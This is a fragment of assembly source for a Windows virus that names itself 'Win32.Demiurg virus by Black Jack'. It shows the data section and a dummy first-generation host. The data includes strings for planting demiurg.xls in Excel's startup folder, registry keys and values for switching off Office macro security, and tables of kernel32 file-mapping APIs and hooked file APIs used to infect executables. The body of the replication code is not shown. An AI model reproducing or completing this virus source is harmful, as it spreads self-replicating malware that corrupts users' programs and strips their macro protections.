sub_header: sub_name EQU byte ptr ($ + 4) db "Sub b()", 0Dh, 0Ah regkey db "Software\Microsoft\Office\8.0\Excel", 0 office_version_number EQU byte ptr (offset regkey+26) subkey_97 db "Microsoft Excel", 0 subkey_2K db "Security", 0 subkey_InstallRoot db "InstallRoot", 0 regvalue_options db "Options6", 0 regvalue_2K db "Level", 0 regvalue_path db "Path", 0 demiurg_xls db "\xlstart\demiurg.xls", 0 macro_filename db "C:\demiurg.sys", 0 kernel32_dll db "\kernel32.dll", 0 path_buffer1 db 260 dup(?) path_buffer2 db 260 dup(?) size_buffer dd 260 REG_SZ dd 1 regvalue_dword dd 0 reg_handle1 dd ? reg_handle2 dd ? dos_exe_size dd ? resource_table dd ? heap_buffer dd ? dummy_dword dd ? filename_ofs dd ? attributes dd ? CreationTime dq ? LastAccessTime dq ? LastWriteTime dq ? filesize dd ? filehandle dd ? maphandle dd ? mapbase dd ? virus_RVA dd ? virus_start dd ? kernel32 dd 0 kernel32name db "KERNEL32", 0 GetModuleHandleA db "GetModuleHandleA", 0 l_GMH EQU $ - offset GetModuleHandleA kernel32_API_names_table: n_GlobalAlloc db "GlobalAlloc", 0 n_GlobalFree db "GlobalFree", 0 n_GetWindowsDirectoryA db "GetWindowsDirectoryA", 0 n_GetSystemDirectoryA db "GetSystemDirectoryA", 0 n_lstrcatA db "lstrcatA", 0 n_LoadLibraryA db "LoadLibraryA", 0 n_CloseHandle db "CloseHandle", 0 n_GetFileSize db "GetFileSize", 0 n_GetFileTime db "GetFileTime", 0 n_SetFileTime db "SetFileTime", 0 n_SetEndOfFile db "SetEndOfFile", 0 n_SetFilePointer db "SetFilePointer", 0 n_CreateFileMappingA db "CreateFileMappingA", 0 n_MapViewOfFile db "MapViewOfFile", 0 n_UnmapViewOfFile db "UnmapViewOfFile", 0 n_WideCharToMultiByte db "WideCharToMultiByte", 0 ; names of APIs that are both used and hooked hooked_API_names_table: n_CreateFileA db "CreateFileA", 0 n_GetFileAttributesA db "GetFileAttributesA", 0 n_SetFileAttributesA db "SetFileAttributesA", 0 n_CopyFileA db "CopyFileA", 0 n_MoveFileExA db "MoveFileExA", 0 ; names of APIs that are only hooked and not used n_MoveFileA db "MoveFileA", 0 n__lopen db "_lopen", 0 number_of_hooked_APIs EQU 7 kernel32_API_address_table: GlobalAlloc dd ? GlobalFree dd ? GetWindowsDirectoryA dd ? GetSystemDirectoryA dd ? lstrcatA dd ? LoadLibraryA dd ? CloseHandle dd ? GetFileSize dd ? GetFileTime dd ? SetFileTime dd ? SetEndOfFile dd ? SetFilePointer dd ? CreateFileMappingA dd ? MapViewOfFile dd ? UnmapViewOfFile dd ? WideCharToMultiByte dd ? CreateFileA dd ? GetFileAttributesA dd ? SetFileAttributesA dd ? CopyFileA dd ? MoveFileExA dd ? number_of_kernel32_APIs EQU (($ - kernel32_API_address_table) / 4) advapi32_dll db "ADVAPI32.dll", 0 advapi32_API_names_table: n_RegOpenKeyExA db "RegOpenKeyExA", 0 n_RegCreateKeyExA db "RegCreateKeyExA", 0 n_RegQueryValueExA db "RegQueryValueExA", 0 n_RegSetValueExA db "RegSetValueExA", 0 n_RegCloseKey db "RegCloseKey", 0 advapi32_API_address_table: RegOpenKeyExA dd ? RegCreateKeyExA dd ? RegQueryValueExA dd ? RegSetValueExA dd ? RegCloseKey dd ? number_of_advapi32_APIs EQU (($ - advapi32_API_address_table) / 4) imagehlp_dll db "IMAGEHLP.dll", 0 CheckSumMappedFile db "CheckSumMappedFile", 0 virus_end: .code dummy_host: push 0 push offset caption push offset message push 0 call MessageBoxA push 0 call ExitProcess caption db "Win32.Demiurg virus by Black Jack", 0 message db "First generation host", 0 end start